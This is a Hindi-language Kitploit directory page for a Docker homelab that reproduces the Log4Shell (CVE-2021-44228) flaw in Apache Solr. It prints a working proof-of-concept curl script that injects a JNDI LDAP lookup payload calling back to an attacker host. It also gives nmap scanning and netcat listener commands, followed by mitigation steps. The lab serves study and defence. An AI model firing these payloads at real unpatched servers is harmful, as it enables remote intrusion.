Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
homelab-CVE-2021-44228 — Log4j Vulnerability homelab | Kitploit
उपकरण/GitHubGitHub/ricardo354/homelab-cve-2021-44228
Container SecurityVulnerability AnalysisExploitationWeb Application ExploitationLearning & EducationLabs & Practice
GitHubricardo354/homelab-cve-2021-44228

homelab-CVE-2021-44228

Log4j Vulnerability homelab

रिपॉजिटरी देखें
1 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

होमलैब: Apache Solr में Log4Shell (CVE-2021-44228)

Apache Solr में Log4Shell भेद्यता को पुन: उत्पन्न और अध्ययन करने के लिए Docker में नियंत्रित वातावरण।

वातावरण

  • लक्ष्य (solr-lab): Apache Solr v8.11.0 (vulhub/solr:8.11.0) जो Log4j का एक भेद्य संस्करण चला रहा है।
  • हमलावर (kali-lab): बुनियादी Kali Linux कंटेनर जिसमें nmap, curl और netcat पूर्व-स्थापित हैं।

लैब कैसे शुरू करें

1. कंटेनर प्रारंभ करें

अपने टर्मिनल में, वातावरण को पृष्ठभूमि में चलाएं:

root@kitploit:~
docker compose up -d --build

2. Kali में प्रवेश करें (हमलावर कंटेनर)

root@kitploit:~
docker compose exec -it kali-lab /bin/bash

3. आंतरिक नेटवर्क मैप करें

Kali कंटेनर के अंदर, अपनी स्वयं की उप-नेट का पता लगाएं और Apache Solr का IP खोजें:

root@kitploit:~
# 1. अपना IP और नेटवर्क मास्क देखें
hostname -I

# 2. लक्ष्य का IP खोजने के लिए आंतरिक नेटवर्क को स्कैन करें (Solr पोर्ट: 8983)
# (नीचे दी गई subnet को उस IP के अनुसार बदलें जो आपने पिछले कमांड में प्राप्त किया था)
nmap -p 8983 172.20.0.0/24


PoC (Proof of Concept) चलाना

स्क्रिप्ट poc.sh Solr के प्रशासन API पैरामीटर में JNDI लुकअप पेलोड इंजेक्ट करती है।

स्क्रिप्ट (poc.sh)

root@kitploit:~
#!/usr/bin/env bash

if [ "$#" -lt 2 ]; then
    echo "Uso: $0 <lhost> <rhost> [lport]"
    echo "Exemplo: $0 172.20.0.3 172.20.0.2 1389"
    exit 1
fi

KALI="$1"
TARGET="$2"
PORT_KALI="${3:-1389}"

echo "[*] Alvo: $TARGET"
echo "[*] Atacante (LDAP): $KALI na porta $PORT_KALI"
echo "[*] Disparando exploit..."

curl -g -v "http://${TARGET}:8983/solr/admin/cores?foo=\${jndi:ldap://${KALI}:${PORT_KALI}/x}"

निष्पादन

Kali के अंदर ही, स्क्रिप्ट को अनुमति दें और सही IP देते हुए इसे चलाएं:

root@kitploit:~
chmod +x poc.sh
./poc.sh <IP_DO_KALI> <IP_DO_SOLR> 1389

यहाँ क्या होता है? Solr अनुरोध को प्रोसेस करेगा और निर्दिष्ट पोर्ट पर Kali IP पर वापस LDAP कनेक्शन खोलने का प्रयास करेगा। आप स्क्रिप्ट चलाने से पहले Kali पर एक त्वरित listener खोलकर (जैसे nc -lnvp 1389) इस कनेक्शन प्रयास को मॉनिटर कर सकते हैं।


शमन (Mitigation)

Log4j 2 में दोष को ठीक करने के लिए:

  • अपडेट: लाइब्रेरी को सुरक्षित संस्करणों (2.15.0 या 2.17.1 से ऊपर) में स्थानांतरित करें।
  • JVM Format Msg: 2.10 से 2.14.1 के बीच के संस्करणों में, Java स्टार्टअप में फ्लैग -Dlog4j2.formatMsgNoLookups=true जोड़कर लुकअप को निष्क्रिय करें।
  • क्लास हटाना: यदि अपडेट नहीं कर सकते, तो समस्याग्रस्त क्लास को jar से मैन्युअल रूप से हटाएं:
root@kitploit:~
zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class

टूल डाउनलोड करें